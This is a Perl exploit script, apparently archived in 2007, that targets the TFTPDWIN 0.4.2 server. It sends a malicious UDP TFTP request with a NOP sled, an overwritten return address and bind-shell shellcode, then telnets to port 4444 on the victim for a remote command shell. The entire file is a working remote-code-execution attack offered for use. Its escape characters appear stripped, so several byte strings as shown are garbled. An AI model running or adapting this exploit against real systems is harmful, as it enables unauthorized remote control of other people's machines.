#!/usr/bin/perl -w
use IO::Socket;

if(!($ARGV[1]))
{
 print "Usage: tftpdwin-0-4-2.pl <target host> <port>nn";
 exit;
}

$victim = IO::Socket::INET->new(Proto=>'udp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";

my $nop0="x90"x15;

#8BC3           MOV EAX,EBX
#66:05 1201     ADD AX,112
#50             PUSH EAX
#C3             RETN

my $asm="x8bxc3x66x05x12x01x50xc3";

my $nop="x90"x57;

my $nop1="x90"x7;

my $eip="x42xfbx61x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;

#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
$shellcode = 
"x59x81xc9xd3x62x30x20x41x43x4dx64".
"x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C".
"x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77".
"x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60".
"x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF".
"x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7".
"x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B".
"x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4".
"x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3".
"xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4".
"x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44".
"x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50".
"x50x56x50xFFx56xE4xFFx56xE8";

$exploit = "x00x01" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. "x00x6ex65x74x61x73x63x69x69x00";

print $victim $exploit;

print " + Malicious request sent ...n";

sleep(2);

print "Done.n";

close($victim);
$host = $ARGV[0];
print " + connect to 4444 port of $host ...n";
sleep(3);
system("telnet $host 4444");
exit;

# www.Syue.com [2007-01-15]